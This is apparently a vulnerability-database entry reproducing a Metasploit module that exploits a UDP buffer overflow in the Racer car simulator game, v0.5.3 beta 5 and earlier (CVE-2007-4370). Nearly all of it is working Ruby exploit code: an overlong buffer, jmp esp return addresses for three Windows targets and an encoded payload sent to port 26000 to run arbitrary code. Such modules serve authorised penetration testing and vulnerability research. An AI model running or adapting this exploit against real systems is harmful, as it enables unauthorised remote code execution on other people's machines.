Racer v0.5.3 Beta 5 Buffer Overflow

2009-05-03T11:10:37
ID MSF:EXPLOIT/WINDOWS/GAMES/RACER_503BETA5
Type metasploit
Reporter Rapid7
Modified 2017-11-08T16:00:24

Description

This module exploits the Racer Car and Racing Simulator game versions v0.5.3 beta 5 and earlier. Both the client and server listen on UDP port 26000. By sending an overly long buffer we are able to execute arbitrary code remotely.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Racer v0.5.3 Beta 5 Buffer Overflow',
      'Description'    => %q{
          This module exploits the Racer Car and Racing Simulator game
        versions v0.5.3 beta 5 and earlier. Both the client and server listen
        on UDP port 26000. By sending an overly long buffer we are able to
        execute arbitrary code remotely.
      },
      'Author'         => [ 'Trancek <trancek[at]yashira.org>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-4370' ],
          [ 'OSVDB', '39601' ],
          [ 'EDB', '4283' ],
          [ 'BID', '25297' ],
        ],
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x5c\x00",
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
        },
      'DefaultOptions' =>
        {
          'AllowWin32SEH' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested ok aushack 20090503
          [ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp
          [ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ],
          [ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ],
        ],
      'DisclosureDate' => 'Aug 10 2008',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(26000)
      ])
  end

  def exploit
    connect_udp

    buf = Rex::Text.rand_text_alphanumeric(1001)
    buf << [target.ret].pack('V')
    buf << payload.encoded
    buf << Rex::Text.rand_text_alphanumeric(1196 - payload.encoded.length)

    udp_sock.put(buf)

    handler
    disconnect_udp
  end
end